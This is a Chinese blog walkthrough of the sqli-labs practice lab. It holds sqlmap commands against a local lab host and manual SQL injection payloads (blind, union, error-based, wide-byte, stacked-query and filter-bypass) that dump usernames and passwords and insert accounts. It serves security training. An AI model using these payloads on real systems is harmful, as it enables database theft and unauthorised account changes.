草庐IT

Sqli-labs全通关教程(手工注入+工具使用sqlmap)

富贵满堂喜盈门 2023-05-21 原文

提示:手工注入就不写了,发现有很多了,质量也还可以,今天就写个sqlmap通关教程吧

文章目录


前言


提示:我只是跑表名来表示我注入成功,具体内容选项参加sqlmap使用帮助

一、sqli-labs1-10(get型)

太简单了,给个模板,大家自己改一下关数即可,跑出表名即为成功

sqlmap -url "http://192.168.0.107/sqli-labs/Less-9/?id=1" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch -dbs


针对一些手工盲注脚本

盲注

?id=1'and length((select database()))>9--+
#大于号可以换成小于号或者等于号,主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4
?id=1'and ascii(substr((select database()),1,1))=115--+
#substr("78909",1,1)=7 substr(a,b,c)a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。
 
 
?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+
判断所有表名字符长度。
?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
逐一判断表名
 
?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
判断所有字段名的长度
?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+
逐一判断字段名。
 
?id=1' and length((select group_concat(username,password) from users))>109--+
判断字段内容长度
?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
逐一检测内容。
 
时间盲注9
?id=1' and if(1=1,sleep(5),1)--+
判断参数构造。
?id=1'and if(length((select database()))>9,sleep(5),1)--+
判断数据库名长度
 
?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
逐一判断数据库字符
?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
判断所有表名长度
 
?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
逐一判断表名
?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
判断所有字段名的长度
 
?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
逐一判断字段名。
?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
判断字段内容长度
 
?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
逐一检测内容。

二、sqli-labs 11-16(post型基础注入)

-r代表文档,文档内容就是你的post报文,至于报文获得,看个人习惯使用软件,我用的BP

sqlmap -r Post-sqlinjection.txt --batch -dbs


三、与BP联动

1.sqli-labs 17(加选项–data数据添加)

这个值得注意是因为后台对用户名有检验,但是对密码没过滤,密码是诸如点,用户名固定,Dhakkan
把post报文内容拿下来

很明显,用户名给了,只让改密码

sqlmap -url "http://192.168.0.107/sqli-labs/Less-17/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --data="uname=Dhakkan&passwd=1&submit=Submit" --dbs

或者

sqlmap -r Post-sqlinjection17ErrorInjection.txt --batch -dbs

你把数据放在里面是一样的

2.sqli-labs 18(--level=3 --risk=3User-agent做为注入点)

这关是把用户代理头部给加进去了,这个地方是注入点,其他做了过滤



sqlmap -url "http://192.168.0.107/sqli-labs/Less-18/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --user-agent="1" --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3


一样,使用报文,复制进1.txt里面,之后都用1.txt

sqlmap -r 1.txt --batch -dbs --level=3 --risk=3


3.sqli-labs 19 (refer字段做为注入点)

 sqlmap -r 1.txt --batch -dbs --level=3 --risk=3
sqlmap -url "http://192.168.0.107/sqli-labs/Less-19/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3 --referer="1"

不放图了,基本结果都是一样的,之后就一个位置两张图

4.sqli-labs 20 (cookie注入)


 sqlmap -r 1.txt --batch -dbs --level=3 --risk=3
sqlmap -url "http://192.168.0.107/sqli-labs/Less-20/index.php" --cookie="uname=dhakkan" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3

5.sqli-labs 21(进行了cookie base64编码--tamper="base64encode.py"

将我们的注入语句编码即可


只写一个了,-url的大家感兴趣可以自己做一做

sqlmap -r 1.txt --batch -dbs --level=3 --risk=3 --tamper="base64encode.py"

6.sqli-labs 22 (cookie双引号编码base64)

脚本没变,同21

7.sqli-labs 23 (过滤注释符)

过滤了注释符,影响手工注入,不影响sqlmap
手工注入的脚本写一下吧,便于理解,单引号进行闭合

?id=1' or '1'='1
这样sql语句就变成 id='1' or '1'='1'
 
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),3 or '1'='1
 
?id=-1' union select 1,(select group_concat(password,username) from users),3 or '1'='1

sqlmap语句就是一般get型注入,楼上写的有get型

8.sqli-labs 24 (污染数据库)

第二十四关有一个登录页面和注册页面还要一个修改密码页面,该关卡使用得是二次注入,因为登录页面和注册页面对于密码和账户名都使用mysql_real_escape_string函数对于特殊字符进行转义。这里我们利用的是注册页面,因为虽然存在函数对特殊字符进行转义,但只是在调用sql语句时候进行转义,当注册成功后账户密码存在到数据库的时候是没有转义的,以原本数据存入数据库的。这一关主要是修改管理员密码。
手段为注册用户为admin’#进行。详细信息
二次注入sqli-labs24关

http://www.manongjc.com/detail/57-kvexuwhtxaxbkpj.html

9.sqli-labs 25 (过滤OR,AND)

第二十五关根据提示是将or和and这两个替换成空,但是只替换一次。大小写绕过没有用。我们可以采用双写绕过。本次关卡使用联合注入就可以了,information里面涉及or可以写成infoorrmation。但是sqlmap并没有双写绕过脚本,因为过滤规则因情况而定。太过复杂,这个过滤规则比较简单,感兴趣可以自己去做一做。
放一个手工的注入语句

?id=-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

10.sqli-labs 26 (过滤了运算符,注释,空格)

第二十六关将逻辑运算符,注释符以及空格给过滤了,我们需要使用单引号进行闭合,双写绕过逻辑运算符或者使用&&和||替换。空格绕过网上找了些资料,对于绕过空格限制有大把的方式对于空格,有较多的方法:%09 TAB键(水平)、%0a 新建一行、%0c 新的一页、%0d return功能、%0b TAB键(垂直)、%a0 空格,我在windows和kali里面都用不了,可能是因为apache解析不了。只能使用()绕过。报错注入空格使用比较少所以我们可以使用报错注入。

?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))||'0   爆表

?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'0     爆字段
 
?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))||'0   爆密码账户

基本上来说,这种过滤之类的大部分是没有脚本的,因为过滤的东西不一样,他可能多过滤了,他可能少过滤了,所以很多都是没脚本的只能手工注入。对于26这种等量代换就行。还有些函数也是一样的。

11.sqli-labs 25a (数字型注入,与25没啥区别)

去掉单引号

12.sqli-labs 26a (跟26差不多,就多了括号)

没有报错,只能用盲注了,盲注的一些代码,参考上面手工盲注脚本,注意替换

13.sqli-labs 27 (过滤select和union)

二十七关没有过滤and和or,过滤了select和union,我们可以大小写绕过以及重写绕过。所以sqlmap没有这种现成脚本,情况太多了。keyi自己针对性写一些。

?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))or'0  爆表

?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))or'0  爆字段
  
?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))or'0  爆密码账户

14.sqli-labs 27a (多了双引号比27盲注)

该关是双引号且页面不显示报错信息。过滤规则和二十七关一样。所以我们需要使用盲注和联合注入。

?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand"1

?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(password,id,username)from%0Ausers%0Awhere%0Aid=3%0Aand"1

%0A代表换行符,不影响语句执行
%3a是冒号":"
%5c是“/”

15.sqli-labs 28(过滤了union和select以及空格,注释)

?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1
 
?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1
 
 
 
?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(password,username)from%0Ausers%0Aand%0A('1
 
 

16.sqli-labs 28a (过滤了union+selcect 过滤规则与27有不同)

?id=0')uniunion selecton select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+
 

17.sqli-labs29 (校验第一个参数,构造第二个绕过)

?id=1&id=-2%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表
 
?id=1&id=-2%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+   爆字段
 
 
?id=1&id=-2%27%20union%20select%201,group_concat(password,username),3%20from%20users--+
爆密码账户
 
 

18.sqli-labs 30 (同29,将单引号换成双引号)

?id=1&id=-2"%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表
?id=1&id=-2"%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+   爆字段
 
?id=1&id=-2"%20union%20select%201,group_concat(password,username),3%20from%20users--+

19 .sqli-labs 31 (同30,多了一个括号)

?id=1&id=-2")%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表
?id=1&id=-2")%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+   爆字段
 
?id=1&id=-2")%20union%20select%201,group_concat(password,username),3%20from%20users--+

20.sqli-labs 32 (使用函数转义,但数据库采用GBK可通过宽字节注入)

?id=-1%df%27%20union%20select%201,database(),3%20--+
 
?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表
 
?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段
 
?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

21.sqli-labs 33 (同32 宽字节解决问题)也可用sqlmap

22.sqli-labs 34 (利用addslashes()进行转义,宽字节绕过)

1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+  爆字段名
 
1%df%27 union select 1,group_concat(password,username) from users--+ 爆密码账户

23.sqli-labs 35 (利用addslashes,但参数没引号,联合查询直接过)

?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表
 
?id=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段
 
?id=-1%20union%20select%201,group_concat(password,username),3%20from%20users--+

24.sqli-labs 36 (mysql_real_escape_string函数对于特殊字符进行转义,id参数无单引号)同32

25.sqli-labs 37 (mysql_real_escape_string函数对于账户和密码都进行转义,使用宽字节注入就行)同34

三十七关是post提交,使用mysql_real_escape_string函数对于账户和密码都进行转义,使用宽字节注入就行。和三十四关一样。

1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+  爆字段名

1%df' union select 1,group_concat(password,username) from users--+ 爆密码账户

26.sqli-labs 38 (存在mysqli_multi_query函数,该函数支持多条sql语句同时进行。)

三十八关其实就是单引号闭合,使用正常单引号闭合就可以进行注入,不过这里可以有另外一种注入就是堆叠注入,因为存在mysqli_multi_query函数,该函数支持多条sql语句同时进行。

?id=1';insert into users(id,username,password) values ('38','less38','hello')--+
#向数据表插入自己的账户密码

27.sqli-labs 39 (id参数是整数,联合注入过。)

?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()
 
?id=-1%20union%20select%201,group_concat(username,password),3%20from%20users

28.sqli-labs 40 (id参数是单引号加括号闭合,使用联合注入)

?id=-1%27)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+
 
?id=-1%27)%20union%20select%201,group_concat(username,password),3%20from%20users%20--+

29.sqli-labs 41 同39

30.sqli-labs 42 (堆叠注入)

因为账户进行了转义处理密码没有做处理,数据库没有使用gbk编码不能向上面一样使用宽字节注入,但是存在堆叠注入函数,所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号,这样我们再来使用其进行登录就很简单了。

login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login

31.sqli-labs 43(密码参数是单引号和括号闭合的堆叠注入。)同42

login_user=1&login_password=1'); insert into users(id,username,password) values ('44','less34','123456')--+&mysubmit=Login

32.sqli-labs 44 同42

33.sqli-labs 45 同43

34.sqli-labs 46 (使用sort,利用updataxml报错过)

?sort=1%20and%20(updatexml(1,concat(0x5c,(select%20group_concat(password,username)%20from%20users),0x5c),1))

35.sqli-labs 47 同46

四十七关和四十六差不多,多了一个单引号闭合,可以使用报错注入

36.sqli-labs 48 (延时注入)同46

37.sqli-labs 49 (延时注入)同47

38.sqli-labs 50 (updatexml报错注入,多语句执行函数,延时注入)

五十关和四十六关一样,可以使用updatexml进行报错注入,不过这个里面还可以使用堆叠注入,因为使用了mysqli_multi_query函数,支持多条sql语句执行。也可以延时注入。

39.sqli-labs 51 (报错延时堆叠)

该参数单引号闭合,可以报错注入,可以延时注入,可以堆叠注入。该参数单引号闭合,可以报错注入,可以延时注入,可以堆叠注入。

40.sqli-labs 52 (堆叠,延时)

该参数是整数型,且没有报错显示,只能堆叠注入或者延时注入。该参数是整数型,且没有报错显示,只能堆叠注入或者延时注入。

41.sqli-labs 53 (堆叠,延时)

该参数是字符型,单引号闭合,没有报错显示,可以使用堆叠注入和延时注入。

42.sqli-labs 54(因限制次数不可使用sqlmap)

五十四关翻译页面的英文,得知只有十次输入机会,超过十次所有表名,列名,等等都会随机重置。id参数是单引号闭合就行。
表名列名每个人都不一样

 ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆表名
 
 ?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where%20table_schema=database() and table_name='RND32WPI3I'--+  爆列名
 ?id=-1%27union%20select%201,group_concat(id,sessid,secret_3QXJ,tryy),3%20from%208fof1zun81--+  获取key值


43.sqli-labs 55 (因限制次数不可使用sqlmap,id为加括号整数)

五十五关是有14次机会,id参数是加了括号的整数

?id=-1)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+   报表名
 
?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='69jwmv27j9'--+ 爆列名

?id=-1) union select 1,group_concat(secret_D1DW),3 from 69jwmv27j9--+  获取key值

44.sqli-labs 56 (因限制次数不可使用sqlmap,id为单引号加括号)

五十六关和前面两关类似需要单引号和括号

?id=-1')%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+  爆表名

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='9ze4qmv307'--+ 爆列名
 
?id=-1') union select 1,group_concat(secret_CTVR),3 from 9ze4qmv307--+  获取key值
 

45.sqli-labs 57 (因限制次数不可使用sqlmap,id为双引号加括号)

五十七关就是双引号闭合

46.sqli-labs 58 (目标返回数据被处理,无法使用sqlmap)

五十八关和前面几关不一样,因为该关卡的数据不是直接数据库里面取得,而是在一个数组里面取出得。所以联合注入是不行得。但是有报错显示,所以可以使用报错注入。

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+
爆表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='8edjk8ipbk'),0x7e),1)--+
爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_6W8M) from challenges.8edjk8ipbk),0x7e),1)--+

47.sqli-labs 59 五十九关和五十八关一样使用报错注入,id是整数型.同58

48.sqli-labs 60 六十关根据报错信息可知id参数是双引号加括号。同58

49.sqli-labs 61 六十一关根据报错信息可知id参数是单引号加两个括号。同58

50.sqli-labs 62 六十二关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号加括号。

51.sqli-labs 63 六十三关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号。

55.sqli-labs 64 同62,id参数是两个括号的整数型。

56.sqli-labs 65 同62,id参数是一个括号的整数型。


以上除明确过滤,或次数限制,或数据处理,均可使用sqlmap进行注入,举个

总结

sql注入步骤
判断字符还是整形
字符型,判断闭合shodua,针对单双引号,哪个报错是哪个
完善闭合语句,根据引号填充,不报错开始注入
审计代码编写注入语句

具体情况,具体分析。
创作不易,有帮助的点个赞,再会!

有关Sqli-labs全通关教程(手工注入+工具使用sqlmap)的更多相关文章

  1. ruby - 如何使用 Nokogiri 的 xpath 和 at_xpath 方法 - 2

    我正在学习如何使用Nokogiri,根据这段代码我遇到了一些问题:require'rubygems'require'mechanize'post_agent=WWW::Mechanize.newpost_page=post_agent.get('http://www.vbulletin.org/forum/showthread.php?t=230708')puts"\nabsolutepathwithtbodygivesnil"putspost_page.parser.xpath('/html/body/div/div/div/div/div/table/tbody/tr/td/div

  2. ruby - 使用 RubyZip 生成 ZIP 文件时设置压缩级别 - 2

    我有一个Ruby程序,它使用rubyzip压缩XML文件的目录树。gem。我的问题是文件开始变得很重,我想提高压缩级别,因为压缩时间不是问题。我在rubyzipdocumentation中找不到一种为创建的ZIP文件指定压缩级别的方法。有人知道如何更改此设置吗?是否有另一个允许指定压缩级别的Ruby库? 最佳答案 这是我通过查看ruby​​zip内部创建的代码。level=Zlib::BEST_COMPRESSIONZip::ZipOutputStream.open(zip_file)do|zip|Dir.glob("**/*")d

  3. ruby - 为什么我可以在 Ruby 中使用 Object#send 访问私有(private)/ protected 方法? - 2

    类classAprivatedeffooputs:fooendpublicdefbarputs:barendprivatedefzimputs:zimendprotecteddefdibputs:dibendendA的实例a=A.new测试a.foorescueputs:faila.barrescueputs:faila.zimrescueputs:faila.dibrescueputs:faila.gazrescueputs:fail测试输出failbarfailfailfail.发送测试[:foo,:bar,:zim,:dib,:gaz].each{|m|a.send(m)resc

  4. ruby-on-rails - 使用 Ruby on Rails 进行自动化测试 - 最佳实践 - 2

    很好奇,就使用ruby​​onrails自动化单元测试而言,你们正在做什么?您是否创建了一个脚本来在cron中运行rake作业并将结果邮寄给您?git中的预提交Hook?只是手动调用?我完全理解测试,但想知道在错误发生之前捕获错误的最佳实践是什么。让我们理所当然地认为测试本身是完美无缺的,并且可以正常工作。下一步是什么以确保他们在正确的时间将可能有害的结果传达给您? 最佳答案 不确定您到底想听什么,但是有几个级别的自动代码库控制:在处理某项功能时,您可以使用类似autotest的内容获得关于哪些有效,哪些无效的即时反馈。要确保您的提

  5. ruby - 在 Ruby 中使用匿名模块 - 2

    假设我做了一个模块如下:m=Module.newdoclassCendend三个问题:除了对m的引用之外,还有什么方法可以访问C和m中的其他内容?我可以在创建匿名模块后为其命名吗(就像我输入“module...”一样)?如何在使用完匿名模块后将其删除,使其定义的常量不再存在? 最佳答案 三个答案:是的,使用ObjectSpace.此代码使c引用你的类(class)C不引用m:c=nilObjectSpace.each_object{|obj|c=objif(Class===objandobj.name=~/::C$/)}当然这取决于

  6. ruby - 使用 ruby​​ 和 savon 的 SOAP 服务 - 2

    我正在尝试使用ruby​​和Savon来使用网络服务。测试服务为http://www.webservicex.net/WS/WSDetails.aspx?WSID=9&CATID=2require'rubygems'require'savon'client=Savon::Client.new"http://www.webservicex.net/stockquote.asmx?WSDL"client.get_quotedo|soap|soap.body={:symbol=>"AAPL"}end返回SOAP异常。检查soap信封,在我看来soap请求没有正确的命名空间。任何人都可以建议我

  7. python - 如何使用 Ruby 或 Python 创建一系列高音调和低音调的蜂鸣声? - 2

    关闭。这个问题是opinion-based.它目前不接受答案。想要改进这个问题?更新问题,以便editingthispost可以用事实和引用来回答它.关闭4年前。Improvethisquestion我想在固定时间创建一系列低音和高音调的哔哔声。例如:在150毫秒时发出高音调的蜂鸣声在151毫秒时发出低音调的蜂鸣声200毫秒时发出低音调的蜂鸣声250毫秒的高音调蜂鸣声有没有办法在Ruby或Python中做到这一点?我真的不在乎输出编码是什么(.wav、.mp3、.ogg等等),但我确实想创建一个输出文件。

  8. ruby-on-rails - 'compass watch' 是如何工作的/它是如何与 rails 一起使用的 - 2

    我在我的项目目录中完成了compasscreate.和compassinitrails。几个问题:我已将我的.sass文件放在public/stylesheets中。这是放置它们的正确位置吗?当我运行compasswatch时,它不会自动编译这些.sass文件。我必须手动指定文件:compasswatchpublic/stylesheets/myfile.sass等。如何让它自动运行?文件ie.css、print.css和screen.css已放在stylesheets/compiled。如何在编译后不让它们重新出现的情况下删除它们?我自己编译的.sass文件编译成compiled/t

  9. ruby - 使用 ruby​​ 将 HTML 转换为纯文本并维护结构/格式 - 2

    我想将html转换为纯文本。不过,我不想只删除标签,我想智能地保留尽可能多的格式。为插入换行符标签,检测段落并格式化它们等。输入非常简单,通常是格式良好的html(不是整个文档,只是一堆内容,通常没有anchor或图像)。我可以将几个正则表达式放在一起,让我达到80%,但我认为可能有一些现有的解决方案更智能。 最佳答案 首先,不要尝试为此使用正则表达式。很有可能你会想出一个脆弱/脆弱的解决方案,它会随着HTML的变化而崩溃,或者很难管理和维护。您可以使用Nokogiri快速解析HTML并提取文本:require'nokogiri'h

  10. ruby - 在 64 位 Snow Leopard 上使用 rvm、postgres 9.0、ruby 1.9.2-p136 安装 pg gem 时出现问题 - 2

    我想为Heroku构建一个Rails3应用程序。他们使用Postgres作为他们的数据库,所以我通过MacPorts安装了postgres9.0。现在我需要一个postgresgem并且共识是出于性能原因你想要pggem。但是我对我得到的错误感到非常困惑当我尝试在rvm下通过geminstall安装pg时。我已经非常明确地指定了所有postgres目录的位置可以找到但仍然无法完成安装:$envARCHFLAGS='-archx86_64'geminstallpg--\--with-pg-config=/opt/local/var/db/postgresql90/defaultdb/po

随机推荐